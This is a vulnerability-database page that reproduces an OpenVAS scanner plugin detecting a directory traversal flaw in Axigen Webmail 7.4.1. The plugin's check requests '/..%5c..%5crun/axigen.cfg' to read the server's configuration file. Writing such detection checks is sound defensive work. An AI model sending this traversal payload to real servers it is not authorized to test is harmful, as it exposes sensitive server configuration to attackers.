Lucene search
+L

Axigen Webmail Directory Traversal Vulnerability

🗓️ 15 Sep 2010 00:00:00Reported by Copyright (C) 2010 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 76 Views

Axigen Webmail Directory Traversal Vulnerability CVE-2010-345

Related
Refs
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
EAServer <= 6.3.1 Multiple Vulnerabilities
3 Jul 201300:00
nessus
circl
Circl
CVE-2010-3460
15 Sep 201000:00
circl
cve
CVE
CVE-2010-3459
17 Sep 201019:00
cve
cve
CVE
CVE-2010-3460
17 Sep 201019:00
cve
cvelist
Cvelist
CVE-2010-3459
17 Sep 201019:00
cvelist
cvelist
Cvelist
CVE-2010-3460
17 Sep 201019:00
cvelist
exploitdb
Exploit DB
Axigen Webmail 1.0.1 - Directory Traversal
15 Sep 201000:00
exploitdb
euvd
EUVD
EUVD-2010-3457
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-3459
17 Sep 201020:00
nvd
nvd
NVD
CVE-2010-3460
17 Sep 201020:00
nvd
Rows per page
# SPDX-FileCopyrightText: 2010 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:axigen:axigen_mail_server";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.100805");
  script_version("2025-01-17T15:39:18+0000");
  script_tag(name:"last_modification", value:"2025-01-17 15:39:18 +0000 (Fri, 17 Jan 2025)");
  script_tag(name:"creation_date", value:"2010-09-15 18:43:03 +0200 (Wed, 15 Sep 2010)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_cve_id("CVE-2010-3459", "CVE-2010-3460");

  script_name("Axigen Webmail Directory Traversal Vulnerability");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/43230");
  script_xref(name:"URL", value:"http://www.axigen.com/");
  script_xref(name:"URL", value:"http://www.axigen.com/press/product-releases/axigen-releases-version-742_74.html");

  script_tag(name:"qod_type", value:"remote_vul");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2010 Greenbone AG");
  script_dependencies("gb_axigen_webmail_http_detect.nasl");
  script_mandatory_keys("axigen/detected");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"solution", value:"Vendor updates are available. Please see the references for more
  information.");

  script_tag(name:"summary", value:"Axigen Webmail is prone to a directory traversal vulnerability because it
  fails to sufficiently sanitize user-supplied input.");

  script_tag(name:"impact", value:"Exploiting this issue may allow an attacker to obtain sensitive information that
  could aid in further attacks.");

  script_tag(name:"affected", value:"Axigen Webmail 7.4.1 is vulnerable. Other versions may be affected.");

  exit(0);
}

include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

url = string(dir, "/..%5c..%5crun/axigen.cfg");

if(http_vuln_check(port:port, url:url, pattern:"Server {", check_header: TRUE,
                   extra_check: make_list("Server: Axigen-Webmail","sslRandomFile","listeners"))) {
  report = http_report_vuln_url(port: port, url: url);
  security_message(port: port, data: report);
  exit(0);
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Jan 2025 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 25
EPSS0.08361
76